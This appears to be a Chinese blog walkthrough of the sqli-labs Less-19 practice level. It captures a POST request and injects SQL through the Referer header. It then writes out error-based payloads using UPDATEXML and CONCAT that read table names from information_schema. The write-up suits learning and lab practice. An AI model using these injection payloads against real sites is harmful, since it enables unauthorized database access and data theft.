zoukankan      html  css  js  c++  java
  • Less19

    Less-19

    1. 有了18题目的经验,这道题就比较简单
    2. 直接bp抓包发送
    POST /Less-19/ HTTP/1.1
    Host: sql.alienwares.top
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 38
    Origin: https://sql.alienwares.top
    Connection: close
    Referer: asa'ddd#
    Upgrade-Insecure-Requests: 1
    
    uname=admin&passwd=admin&submit=Submit
    View Code
    You have an error in your SQL syntax;...version for the right syntax to use near 'ddd#', '117.188.186.53')' at line 1
    • 返回mysql报错的结果
    • mysql 语句应该为 
    insert into table_name values ('a','b')
    View Code
    • 开始sql注入语句构造
    sELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE() 
    concat(0x7e,sELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())
    #记得加(
    select updatexml(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1)
    INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')
    INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (''or 1=1,'127.0.0.1')#', '$IP')
    
    INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (''or UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1),'127.0.0.1')#', '$IP')
    'or UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1),'127.0.0.1')#
    View Code

    sql注入大功告成

  • 相关阅读:
    wenti
    vim
    在两种情况下设备与驱动会发生匹配
    用Qt图形视图框架开发拼图游戏
    Android RecyclerView添加Header头部
    Android Glide加载图片时转换为圆形、圆角、毛玻璃等图片效果
    Java 集合深入理解(4):List<E> 接口
    你们公司有职业通路图吗
    linux系统性能监控--内存利用率
    linux系统性能监控--CPU利用率
  • 原文地址:https://www.cnblogs.com/hackering/p/14273474.html
Copyright © 2011-2022 走看看